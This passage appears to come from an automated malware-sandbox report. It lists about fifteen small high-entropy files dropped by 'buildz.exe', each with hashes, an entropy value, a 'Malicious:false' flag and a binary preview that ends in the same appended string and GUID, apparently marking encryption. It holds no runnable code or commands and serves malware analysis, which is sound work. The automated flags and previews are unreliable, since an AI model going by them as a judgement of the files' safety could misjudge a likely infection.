                        SHA-512:E0A795D23C3CCAA798DEAA9D4C47D30A62232F88E5BA8DFB0D646D7294C209F7BB935BBD6451CD645BFDB6266291CA1DF7501146C1FF78A8923B2776FCE5DAE5
                        Malicious:false
                        Preview:<?xml..`.X\rr...:......j..d.7 R....m.,...D../.]..K.-(.....-......i/.M.L...-%E......5.t.C.........k8/.'.Shc.(%...;2L<....<.]}q.er...Z.f......c.p.]...r. ...n..q.....q.x..t^.cf.3.a...)3..,...A.4.:..]..Q.H...y$|..;....{66..BRW.1.."XqE.C....~....+.. ...S....=J1.t.8..<...x.TL..T....f4.c7.#.ga.9...K..7....@%....u.N...Q....C...9I.<~F...."hj{..+..o..........0.<....xu.z@%..!..=.?/.p...[..!..z=..V...z.i\..a...Z. D..>......96_u./..T t.C....a./4"WG.....~...'R.]....}..]....03..F..!...l......]..'fn.'1...T....-_e....YOY\_`z...u.....Q.;...G..w....,.....K....I.?...\.....6..4...#2.r...Z.d.._..S.$.....9].,...$;..F3...X...v....X..q..<)..4_\.EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):819
                        Entropy (8bit):7.770770822941754
                        Encrypted:false
                        SSDEEP:12:V9qo3Cdo5JKUcYAUKNVoQNnLfM09ej5kPRS6NaFXRBYKplaOKoVzNhS+g26Gciik:L0dKKUcnoWM09eFgA6NaHEtoeGbD
                        MD5:D8B1CD0346BBCBB4CC1E797FA13306B5
                        SHA1:EFCD8EA3681212454FB82D7BA8F26F65A593E529
                        SHA-256:402BC7AFFB73EACEBA7450430AA0C39233E6F89625AB62E1687A1F862EE86253
                        SHA-512:637252EAF7B9652E61C3E60D63778FDD4152C88A7E02CC6271AF8DDEF1394882A98C0DE604631D948B3C737CC9CF5F45D0091909E42DFD980898595FC69FF8E4
                        Malicious:false
                        Preview:<?xml.V.5Q.;...R.XV.Z..T..&..v.u.!.b.;.K+.E..8@.....X...+uL..R".q...s...$...i.....?_....:.9/tF8.T.nB.....#8.7.NL.yb..8...1r.mt..j......~m`..,.Bp.]R.#.....g...m....8.B...c.......'x..L..*...$.hY+...k....:.....X-"..|U%.i..g}...)........5...9..\....|.W....(.h?[=.....Q..._...=.Iy..'....Tz..*.n*..3..PPr....y......B. ......=!.....6A...c..2N..!._.../rI%.I.....Z.k...qe.=.F..L..B.]....-IU...Z.[..x.O,.i6.e.v....Y+......>....\sT..... .z..B.Z..2..A.87Q1l.............{('......V.lv...\...{~=...U.j.w...ESt..r....16...7.X.0.{(r.sq.J.d..![6I.Q.}..&\.&u...A.3..P../.\.U.ca=.:.`...6N...MO..M.co...X/...!...o..~. m.l..V.2....P...)......x.4..">2.W..:.h.._...5...<$#......).......[....Mxh.aB..F......N.... ..j......Qr.*EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):760
                        Entropy (8bit):7.68807942414769
                        Encrypted:false
                        SSDEEP:12:u/nuRgYgs7EAnKzdsNlGPMsZDaEv1kBmilNU0jDkLKOWr3lGqIC3//26Gcii9a:u/uGYgvAncuHMtNkBHlNUPK5r34qIC3I
                        MD5:7E64BE689655645337C73643C9EF938F
                        SHA1:277E3D04AB907D6FBE5B7D9808BF14689D64CFC1
                        SHA-256:B74C9E2FC8F64E12F41321B1AA3ADAE8BF985F12A4E327BD7137CFE664E4D06D
                        SHA-512:29B7376D98DA8C0A35B3DF7EE05BE56328E93EF1EAD8F6B8E5F6FB5916BB12E3DEE3C7D8E7D3D0CCA5031B22B3633601C9551F490EF5FA59F2785BB9D5FDB43E
                        Malicious:false
                        Preview:<?xml?....6r..cBx.....J..'...~...$.c~J.mm.v,...l.+.0.I1p..:.[.w$..a.}.f`..%.z.YA.E.>6ED...P.3p.....b...-7.h.\.!..i....+.Z..^s.2}}.I.Z.f.<t|h?.ue.TZ..n..0.,..r..=....}.=....ic....E...V{.H.QbI(R.(.?.*..R%..-_#...Zy.6.*V..^.-H04..2.ep.8.$"..O.c..%.;..y...M.[....7..{..F..Q.%../x.4.&Q.....nm...x..s.>.o`'..O.[6._.!....s.k....S1..... ;.:...A...4..N'..D..(O!....Z...E.....K..l.)..Q..8..L.Z.<.J|..d\....l.....ZL....&b...l...]...3*.W:`..*..9y.".......V........".{.W.m....P-.f.m.....Z%.yump..+....z..-KM...NmQsJ.<*......~.R.3..r.P>..:..Y.<z.qs....i.....19.SZ.td.e%..$.w..N.9..S..xD.. 3..[...,..y_0.ON.....B.z...R..6k.r.J....u......r....e`G.......1....".X...EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):819
                        Entropy (8bit):7.712332459282998
                        Encrypted:false
                        SSDEEP:24:WOZkwmkLe0eGxh1DEwLFehjkuyNhghGbD:ruvnGzLFFuyPeUD
                        MD5:7659940125E85251BB0E5D16EAFB1601
                        SHA1:9827E69664461848787A63CD6D3828225649A2EE
                        SHA-256:4D667E26F38745CFE96FE3E32A8D56836544688B2ADE278199CAED9B6E25CA34
                        SHA-512:E2472EAE89DEEC14506FB8DF2299F160382C18DD91FFC0682F437DBAD93815FDD5472C450F7836B4D01C61B9ECEB2C1C129CBE24958F3B3FA66785D762337325
                        Malicious:false
                        Preview:<?xml.....4mG5...p._4.+u...c W.*.F...p....%b..R.i_..n...jc.o..G...W..Dt...O%....tNA...a..x..B...#.JC.....Y.;.{..4...p.....T...6....-*.ZD....Rg...........(...Z...FD.<s.;2d.a.H..."gM|..L.f.....ya..v...-<..+TK.>..0}..v...1.H;..\..2..p.<._<..|z.#...Y..FX.RI.....CN..I.".?..2/..1M8...p.."+.P...DM..%*.:..Or...e...$C..q....^g*.._&......".@$....M& =^..b..@'<F|.Z.-5..<...U.S...{&.(..-.Ds.....e..z...i..d.`4..J.....h...[..I.7.....#..v..>U.].pB`..v.....c.Z.@..X..%.Pp.....z.@_.M...i...G....;.fx.og9.`....&.D@..W.....d".{G;pj~...@..u..EB.."......D....Cg...T.U.Y...7._...g.S..;..^O.....*/....7....&?.J........}Uc7...cq..H...H.VSY....<g......m...h......)..<z...$.......m.+...'."Eg-....:|".D}.. .....".9kj.....EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):740
                        Entropy (8bit):7.69217204667049
                        Encrypted:false
                        SSDEEP:12:m3UZlGDTixvSllZpmhnFCMrUGjzvi+7sglCvXlrsPiKPjCkOwjnQKaVfmk+tj3sP:m6lGDTix6LZpWFhrfjzi+7FlKCPTPF7o
                        MD5:7CCD828F782272E18625792E3A81715A
                        SHA1:A28F7F3BA1F2DBB2F8BE787080F6FC0A2BE0B1E8
                        SHA-256:C47E722B5B1C2E0F5687348B731B5A3113161DA45F9BFB2BDC4EDA4333120392
                        SHA-512:FF19ED3C777659975DE54A84608C0DAAF2EB355E729ACBA0F15A34F57CC9B0BE7A77987F406A99914DDB9EF81E1D020AAAB8E30E22232EA80B051E1ADA5EE496
                        Malicious:false
                        Preview:<?xml.l.b...aF7.../..........r.Xe.".v.m.......u..b.1.y..Q..T....R.....N|).n....<.[.LD.t..=..u1.o...U...7.......A1...=?...<z.../6.....9....2m...(U..}+.i%...T..r...dj.Zf..1x.....Wk_M."4.....L..R.M<..>l...Qm..............l.'.rf..8......oV..]'w4^.{..v..I.v..t...$...k..D1s..j.S`..,X..,..\...=.a....C#w!.%..$~..\j.T..............pn=..Y....O......._.....:hn.}...gULU.{....2>.p......|......,=..*.[7...o.....!..C..R.YY!f....)~.-)......4>.....N...g.......vM....,b%...3#.......-.02s.<&.u...^..I.W7..:.M.'....a:.#4..l.>'M..3..6.5.(..Rr.X.X![..ta......c........{.3t/\.......LW.#......O.O,..b.M..TTjq....ts(|B...?..x..-..}...EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):802
                        Entropy (8bit):7.685489615291347
                        Encrypted:false
                        SSDEEP:12:yBEoo4QxkZn+7E9/+ozOnmzm4MI5YSwniRTn28vWKSrKOg5ni2V4iNJ6kc26GciD:wqp2+I9WlBa5YSW8OKS7g5n/l/6DGbD
                        MD5:B1C79809FFA421F406B910F0E3D044B4
                        SHA1:CA1BE04B6D3E05AD0A3FFBE78AA78558ABAF4B7C
                        SHA-256:26138003E2DDF57E9E6EE1DBD3B8A48665697E6F5A2C90B96FB8220A57B2473F
                        SHA-512:0A7975DD45CE0064F7DD9321B581CC1BC85802A91C588C8CACF16F200AAE1DA0260ACEE3C79771646A9FD3B89893DCF7C62D0040E101FDE4B7752876192D30C8
                        Malicious:false
                        Preview:<?xmlb......t`...rN..7&Z.`.@..j....K7n.{\..O..q-}...].XIiDd.D...H.....Yr_.u...A.8Q...>o.......G.....)...............T..H...A.p5i.k6..MWx...0WY. ..........#..kw8.......[_...H....a.].C.1~P.s!9ng,8.......+..-..A..D|Mqlto....j.`.>#T.....$,.7.2..z.i..t4...^..._O....t`......&..:.P.5..?.......4.u..z.......GJ2...it.......~AZ.7..I.2u-g.P.r...w....4Q. .+.F.r...LC....J..B.6..Q~/.Y..>...p..UZ......=....w...O....5.!G?Y<mD.3.G........]._O..`..3.....BZX.T.VU...?G.....(+AWJ..H.d-..W.k3.%bY...P.o.,3.!~....|...(4.N[.T8..{...c^..+....xi..U7.sR...7....T..]rO...e....|M.nR3...G:....TR...@|..*.....@.#.8...2.....j_...q.QY..N.x.AT....Ak..X..o#..,.u._.....k.f3...<...Vw...eD.r.+...=.?...._7Q....E....k.#..t..@i.EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):748
                        Entropy (8bit):7.649304541488307
                        Encrypted:false
                        SSDEEP:12:g7vGU/zJB0lEqsM65Ph7t78Vi3ut28xp92eWUFTf0M1VGS/GsRy9U6klqKlJV26A:g7vGU/zVMmHki3uEP2TsiGSw9VYqKlJW
                        MD5:1F34B7E832C481960750F93EEF2BCF17
                        SHA1:99F3314247244B7BEA5A96D8E7A419D4D0D32B9A
                        SHA-256:3007B33BDE3FBA2C2330AF9C654BA78117591D5ACCE6F45D230C97E03D515505
                        SHA-512:3EEEA16B42BC21F8A5C9DF8FC4D1E32384411B69F359B5A9F00B14AAEF585BA1E3348107F1DA83572AA2B9395A8247DDC757ABC6CC5A5E4588BF6937C3D0295D
                        Malicious:false
                        Preview:<?xml...g..dl.....P......2...:..!....i!D...qW..p}C ..."5z..D.j}.K.N... ....6...Y..H..i.DV........H..:.J...!.nL......@.....w[...|.23.H..%.?..6..1..A.?......._...`2*T.^.o."..FDMV.-*.u@6.8..7....pYv.6...B......J..R#.X...=B.[5A...._...."A>..,....YQ...np?$xn.lO'..\x...4...]..".q.H._x...A3F..l.Ne."R1.1....u..j.H:..-.U>...y...,..{J]X.x`1,M\...%.Vu...,...i......sC....V.5.c.....x.6....lhg.....;.........p..b.NY..6N..7%..O`;.@..... n........!8..[;..9.,.....R.[......z.D.y..Au#..\.....x.....0.....T..0>Lxi]T.v...#f.|sV!...,..t... t...dF5m..:.....O..4.\...c...%..'v..l....3M.I..g.l8c.Y...."....v......8.......H...w.'....../L..w...OG+.S.......EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):810
                        Entropy (8bit):7.688180612256365
                        Encrypted:false
                        SSDEEP:24:CR3Md6d56KJIRMt1FPx9M0Pj4CP7SfTOzmGbD:Ij76KJrxckPPAwmUD
                        MD5:62DF7A1891EC6699FBE89E474D049415
                        SHA1:4AD910DA2BD82E8FB73B565B8E06E67CA78EEF36
                        SHA-256:C993ADA7ED68610455AE8C1C2DF431F03F0325A82044356082570B92533498CC
                        SHA-512:05386793892CC403F0EB49DF179418B6BA283A72BD821EF0CFBA2DCB32E94B10612143B93656336B39702527B1AC600125FD8FBDBF92FFAD6C8314ADAF4AA3B2
                        Malicious:false
                        Preview:<?xmlZ..3$.....<...........K..A.......$..}._.=..Y.:&^8...}KP,0..O..db....I..9...Ka...R...9...5e.l.e.G..I.B......&....F0..0[....+.r...<..6.....@Zs.X..r......$.T.B4.@.GJB..&t....H..<.KX..P.B1..-.W|...\\.c.Y...E.,..z^.6?"......K.l....~..S....I.X,..T..NL....... V...x......\.5.FxP.,w......~.%=..*....r3:.H({8O..m..9..j.:'...L.B.....b!y....&.....H\..!".a`.|B.?...N-:5.....=.r.IK.Z.:......U.VC...(c.X5$N.M...<S..E.y.......!.<....W.-.%.<t5e.).\h$....l.5.....p.Xl%[8...0.+..-..`...$....&.}S/..><.H=8.)...W..>......:2*...N.Cx.....P...}w.9.^...4.....a.t...d....".u..&.=.../....R..lq.....v.Q.q@.U...=d...k......^.~.:.[...r.X...B|t...H. l..o..1.N..9x..7~.x.X..K..A.g3..h..M*z.W>+..-&.S.EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):797
                        Entropy (8bit):7.721556551502195
                        Encrypted:false
                        SSDEEP:12:r2ScH4p+FJgiiQARhV4Db/RVzly9DV5zA+1j1gPUECVWZ0b0JPyB6wrGsI26GciD:aS4kC6NhV4D16dF1gPUE5rl26SGRGbD
                        MD5:1FF7930300E5782B6F1D50349C5A5EA4
                        SHA1:09D248B2A10E166D843BCECBD800D7C261AFD3D4
                        SHA-256:A689B1B104CA0E520C3E7235FD00D6D48E051451F168A77E3B58482346AF3BDF
                        SHA-512:36B8E6A9578109F43CA43FCFEC990892E92216AEFD887A8C835398D077134D93161F3609D2468FC1C9AC6E57F52F943A8758ACFBB2DF418C17A13B1E4732BB18
                        Malicious:false
                        Preview:<?xml..9.u.q.T:..."[..3..........:."U..2. .$.....:b.D./@t.`..(..@.L.%.H....e.C9.._..h.=..x..0.@pXR.p....V.J.Z.@'.......%Xm."......m..%'j.!&m..6..Q....fu......HP.?.....jM.S.G0...k6.+...F....>RO..F.c.......w.._..:..)......&.R...^.|../.&.AO`...k.\..X..w.~P..%..4.D>...s.B...36.......6.../z.fyh1.r.v.{.P.`.....Z....../.o.5u...>S.Ciq....e43....H.=Il.....d..eR..N.;B..;/. }.p.n...6.U..rE2.J.h..]..&..n.>V.e...F4.H.V.G...MRs8e.`.ZE.L1ft.N7..H.J/z......!...[.T.t.<.8.,..r......!.ws....m..l.....}.G......u.;.D.s.<.e.g~..0cT.j.Cm|s..@...Y.3u;p.....u.c.....r..].;...b.E~...k.....y.V.0*2;F..<...#'...gL.9[*..r0.>L....~<....$........{..'|.@f..:".+.S.iY{.c.!.>......d..z......Y..8.b........,..|.....lEdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):827
                        Entropy (8bit):7.724484896052978
                        Encrypted:false
                        SSDEEP:24:BTW23Uqf5KVU8+Dii2eN+je/zWKLYhDUxZjWUYGbD:BTW23T5KC8c2w+jgmDUxgUYUD
                        MD5:C337D9357CAF4FC6D5C4BEBE6B97F14D
                        SHA1:88745A78CD4022B94BD4BEEF34CAD357258B9868
                        SHA-256:B5D072DF8E0AEEE9144612A19E7BC87BCE45D7DA712C3125D096B8856BCDF27D
                        SHA-512:D79F4EE25E707A7F90CF8F2C808B457FF0823951FCF2BAF3BF87251BC972E66C1C264DD71304F9558DF31A368269276DF1004E286027FA7B4F0891B2A588BB90
                        Malicious:false
                        Preview:<?xml..@/...v..>..i...._.C.....D...;..#xcBl.\....h.....R(.VN...O.D.aP..kw.L=)...-E.#m7..6b+....x.)...Wc|....LbFN...........L...".Cz.iOzWc..x...2/.......Ok .....}.~........ty.z.......Bd....l..C2.s.. ..1.[}3..H.pY.c;.+..`.D.pxTq..3._...8X.n#.....&.bP...]v...[.9.5.s[..3.i9..8\..["...n.`.......v*"B.....:#..d.-..Y4.Z.......j..sK..2.u^h..g.......s......5..g......RJB......@.m.w..V..5x.V.."...J.@u.V..S.=F...#.R>g.(.a..........:...4}i.P..0.1....j....L...:w0.....,{....D.@!....%@. .9Td..e.r..#L..b.~j(..vT....$.$!+....... ..2..X...<..~"#.....O.?I..%..T.c..(T../Z..&.rt}.R!...Sy.?........S.4H....$.x.Cm..He......K.]*.....F...Y..O@L=+.0.y.>...........x.....".Z.l[.CF=N....+j....8N}..{{..vYp.]..,......Q.....7..GE.r..EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):752
                        Entropy (8bit):7.706034488155877
                        Encrypted:false
                        SSDEEP:12:k6uC/TYT0apb0L8i+pXUui63JFgOOyBhxBqOZ0LG/9eNSgO/uiFpjN26Gcii9a:9f0T0H+pXUur3BhKe/ItO1XJGbD
                        MD5:72BC45B9A522E4B8F12E1CCF092801D7
                        SHA1:1D746D3E517CBEE24BE6B5B7D4FFF4952A533E00
                        SHA-256:5ADE0A993475D63C5C717C1E2960D8FCB08465E107A5A6FA13078D77771F519E
                        SHA-512:9C0446BB5B12F2698337E59F1D500C16AACB17729E6CFF8D94CC10C7D8612E33F7F8488D85A2D8DA3D277D3541DA12A6ADB157DA62DF227BE98593B347C22CD3
                        Malicious:false
                        Preview:<?xml:`.sfZ...@....d...F..,q;g..kir4....q5x..\.....h...Q7.O.%...N/.!.. B..../q.../...>W.?....X..l.X..)ZU.i.R.K:...I...T..+.@..O`....8..|.....E"....r@.2.>..2^%5..ie>..j.1.2O*.1..vV%...W..o.8.,.....YG.b^..E..O.(&@6V."u..h..9.).K~w...XzW.&.._....P.fs..m".....-...l..G..lb.&'.w9..qM......Ww.R..B..<.<u..ZW....e.zYq'$H...C6}...&...q=j.iy.8..u}v.lY]..].R}.^BZ.s.....B.../..K.E..h.a..gK..X..h..*.a. 'uj.....Rp.s............>..z.....S...Y..+..2..@..2..WE..o.c..IBt$N..x...rG.).+..F'.+....HCF.{C.Q0.?..K...t..9..ThW.M.Yf..$....?.J .O.A......z?T.....j`E... ............n....o..8&.'..v....PX.^...W-QH.,\.0..G..Id.(G...A........Q....s.3....x..........C........EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):805
                        Entropy (8bit):7.740156467258672
                        Encrypted:false
                        SSDEEP:24:3BwcyQ2YIV60OF8K99NVKYejeLw1Lm0nRzJfkGbD:3pyQ2Y70OS+9Dk/kUD
                        MD5:5320F413D71CBD74AE653575D27C192D
                        SHA1:33A444F9FC1FCB9F456C99B4372B706F2EC4F0E7
                        SHA-256:60C30CE33D032B087F30269532522E93B2005121B265B487E1D0A731C81749F9
                        SHA-512:333C36058A9FEFD0E0D91DCECAA35034E9DDC93A807E1AC1CFBF19F21A4D6ACF694005D7C9D41CF07FB3BE9BE2EB27AFA2286834543FEB04CAFF4CC2D63BD9FF
                        Malicious:false
                        Preview:<?xml.8iA.......dT.{&.......5..$GC.T...}=......W.R..k...a0.`.}P.bM.2..Q.J.~j..ZR.\..T.'e..Q...{.x.A.p.?....qz....-....\j.Pri[.......G-.........&....o.3)DJ.?.A...q.M5..tP.y.5s.z#?..|.b....70..|g...).....?U..^}U..:.....l.L..4...c d.P.&..q?.w.k...P...U.$~E.. ..P=.....t.%...<q..9..$U./Xc.........J.L-XZ.O../...:..."..A...%...wurc....!QV.&..;F.\ .t..|...sf.V..Q..>.]........[....v.-.5".....6..e.v'.....@.|n.C.U..};....%.H...].L..n^Q.:..&nX..'........yhc.#.]J...{.Z)?8..U-Z.WZ....L:...>...f1V..n..~..=....6. ...fr...T..w+t,d..r..L[....2F..2pQ\D>a.....l.cho.....t.K~1S.V......%@..3.5.e:W...$.M.a5V..DX$.3r.Nk.+.c...rA.7O.....[.S..g.-...5Pq).1...X...e?.,S.%.oE..x(..aX..Q...-z{....I.H.Y\b.#o..Q.$.....EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):737
                        Entropy (8bit):7.648532183868612
                        Encrypted:false
                        SSDEEP:12:XsQJ40FWubEk4BHj8w6FRRguY9MdwwPZsMhsnvShGOk6p7lCTlm8EX26Gcii9a:cQJ4ebEjD6FAuvdwssMhKw7pCPqGbD
                        MD5:F695B2A2D040E8283A74C29C273248F8
                        SHA1:82ECD2F54F8F698DD369E89BEEE7CD04D237E99B
                        SHA-256:44AE5499E6438D99CF98610973994C1418B7A401FB5E23E7C728F76E054CF9D9
                        SHA-512:27D7DF2B7EA031B5FB794BEC4EA7DFC399C6CC2BB24C1300ACC684F88B50942FA00D98FC7FCF23B1376EFFB3CED81FE8C877898337EEFFCFE8B79D86934F8FE2
                        Malicious:false
                        Preview:<?xmlvhg(\gA'....-...$2Y.Z%....4J.>"}...Y......(...q...k.?}.t..(.g.NW..3.;.m.% ........,GMKVU..Z...~..g.x.1......l.GC.!O..:.6-.....E...C.A....K..f.z..'.<.v./xX]..V..`;Z....B........}l..1.?...=.g.'.@44.m..?..l....h...@p.h.]C!.V........r=...:$..)(.KR..2...D..3.W..f....g*,...9.(...:n.....hm..XPP.Hry.y]N.]..6'g...=G.L^..s.P4...4T>.<K..RJQ``..2...K.{.T..._.XE.(.8.........M...a...B...%.G.VC(...X.....i.j.b'.Qt~..a......R.......|..X.7..Un.Y(/*`=..D.Cz..li.....5#...!..Z.g.(..X.>s...r....p..07....!......^. .~.m.V..K.?...3il.K..|\.f...N.n..e.....|..:f}..r.=..%.pU#dIY..H;.N.J.i?"....S........-aa.9........!.....}^...u...r.O.......n.EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):801
                        Entropy (8bit):7.711669223642531
                        Encrypted:false
                        SSDEEP:12:TfRsVqaa0NrFmP3Mkqsnlr1BH+XtRcWA1Gth47gNICAu6u+tvKR7zvoSACavyc2b:TfRssp1nlWXqw48su6FYtDA7yuGbD
                        MD5:35C8A857A52AE2DFDF5A9439C17010CA
                        SHA1:2A0C7C0679F841DB624CB9C595CBB76A1E0E90E4
                        SHA-256:F56FD76DA593C7AC5659E5163FF9F3B6388EF5FC079F3F91113D37A7E8F48BE2
                        SHA-512:065D361ACEA144217BD832F2236D17C54DC4CE582EA85AB2D377DC4E7EB7FBC98345F6C13FEB64B9AB6F24FFE96FE08C25317D10588C0FF6F515BA4CDC2D74D5
                        Malicious:false
                        Preview:<?xml......d.a...>..b..^f.....[.....p...b&..|}P1..."..l....!..^..L..7...6.We.....?.."....9.[..6h...k,.m.K....._..'q..c.R..$....G.J..R.....l..Q..>l..6...-Y."~a.....v.....l.....0.Cf..c'k='...K...h/..<A ...'+H..t...i%.a7....?..@1Y{.......S.H.\5U....P.M.K.{./*..0R...7w.E.".JS..).K'.~K.JR....<@..Yd..j<39N,i.:.a....Yb8..../NMs..U.P.3.VjZ..uid.u".~Ok....,.d......(.<6.`ZW...S~...+.i....._......j.{gq.....0.~..4E..l'Z>.@..\..`.....X.Z.....5|.y.....c.8./...ea...f...y6.]<...m.n&DA..S*....|.....x5.C.>....M......q.d*..E.y...~...r...NPQ6{.[:.K.!..2-.."..81z....^.`.{.tC..>Xb.DX...$...9p.../.?....S.'.-...Cot_...W.....=...*..sT-E...r.H.W..I+5U..=..0....p..m...Z>.....'..S...s...w0......{@.t.....A..&..u.EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):761
                        Entropy (8bit):7.695097739791746
                        Encrypted:false
                        SSDEEP:12:UKDNOeuP4OsDmGVeYvdcNznAFKQdtTsAkIlbpIwTY6q35Fih5nUKJvRyF26Gciik:UKUbtGAmeznAFLwV+b+iXQGbD
                        MD5:4E7CBC6C56C66A2B80C993B8CAD4B11D
                        SHA1:EBC1D9E1A49148882A50CC55AAA4240A8A111F85
                        SHA-256:409F519CA642506CE1423215FB0311FAB8FD359E2461B04A50B7F8934242A0D0
                        SHA-512:C9D88E24AB9FE7E35762740BFBD6EAB91E41A448F5B55404C180BB1D1B39B6535B08F1769320611C7A07FFBBA1808E8B56C9F93B996C9F7661BCBD826427A365
                        Malicious:false
                        Preview:<?xmlsZ.......?*..A.~(..[Wd..^.7....R......d..3qm..M.../....J...uztUb.. .9.4H..lK.....>D........[.>.:..5:.9I..kA..4.RSf..v...S*...QE..Alo.G....wF..........r..;..y2.E.=...]hs].b.....,..:.p70.b{=|.....UQ5../........^...q..mX..#.x.d|v......P.sC.Zf.K.>.,G..*.R.^.,+.bv....7.l..n7"..;....}....=.i.*........O..v|.....>....G1RA.He...M.....g..-..i.....=.......K.1).F......_.G."X....T.....c.}m..........`E0..7q.B.^....I...3..:;gi\l).....qF.;g...3m+...>kf.1E;...B...D..2...5+.....FB.A.....p.^V.....QqB.jU8Z...{).W.....m~....Ok.*...P..h..@. po?)";.I.aW.....G.I.{k$S].j..}=...wa .6.t...MSJJ~..&..#....;.C..J:GUifa.W..5...$.l.P..Y...1......u.......s.|..).EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):832
                        Entropy (8bit):7.718976845862359
                        Encrypted:false
                        SSDEEP:12:MXhvBoWoznHmjxHBG2NsumLHcszb2cMM7ilOV4/LCwNkirnJN029N//26Gcii9a:8TK8HE2Wssf2cSbNrE27/HGbD
                        MD5:3E5FDCAC8C227186FC1198FCAC4A4B98
                        SHA1:3079B5AF83DBA83C1364D5242BB13E7D7EBABB33
                        SHA-256:8C5548F7FAA6276BE225511BEB3E0C9BEC2BE5DC4F4B38CADDFF383BF4B88B5C
                        SHA-512:8EBF9BB7C637D151070B1C9EDFA0B3A8DEBB97D1F220D451C342F47AA471265B93220CEF6F7D6D7AFC48F985F260F67F0047AED27C8AC80369B19CDC90CADE96
                        Malicious:false
                        Preview:<?xml1..{,..J.<...7.`0..x.r.s!...K..-.O..._<._..X<......p......S.\.@.%.!kk.........s..T2.S<sp%T$.(A^/.x../1..X.'..2c.%....F.8..`Q.bp...a......A.O.j.j.....6..nLP..,.e.....C.f.....w..(&P....#y.R3.c$.N.#`~..-iPw;.....pQb..uq..?...-..n.i.=C..C.;.NL..A.1.~.#....Pue.T..N...5..]_..".9.s.1.x.W.}3.._.wPM.7k..2).V;l^.M../....D..C...?.. o...1.T.^.EU.\\6.&..du.}o.E?fav}O.K...iw_...S.....lFmJ.........5.j....}..Z....:W"]....e.'w..k...&h.7~@.$B.I.F..25r;k..=..x...V..`......jU.;/'F.<.$f.h...!2.....P.MT.b..7.V...{.6...4.siP..a....Ga.U>..t....n..5.....4k..l. ..6..t.f.5.t]...4.9....b.n.DCU.ic......EZ.C....=.c...Bc..Q/.Y..V.D.2.X.[W.s..Ah.e..Y..9.....G.r...B#..y...."..W"u...{.>!.{.C..Z.\}.c......'np..k..].........@..&..cn.EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):748
                        Entropy (8bit):7.7004384353364195
                        Encrypted:false
                        SSDEEP:12:xfGFgjXLpGOUscDeAl+T10Rntcr+aDUAwJxbV37+ANnTLhhfD59x2StVAAE/26GX:xeFgjXLpLUscqMur+aDqTR37LzDLVtEg
                        MD5:B1A3607F0E08D955D94C33E7CD332356
                        SHA1:83EFD906036F1D82CCB04806DFFC436B9A94FA56
                        SHA-256:F3309843BB56D87D9F376CE38A03C82F63C886C982096F65BE78D5E0F7219EDD
                        SHA-512:EEDF1EA7AB762160340618CF755A8E60F99EB5D16F480612EA73989CC9BBD5E32BD47C40C902C1030B91C03A14564BC724779FBE3D497A7A81B9C25597E28ADA
                        Malicious:false
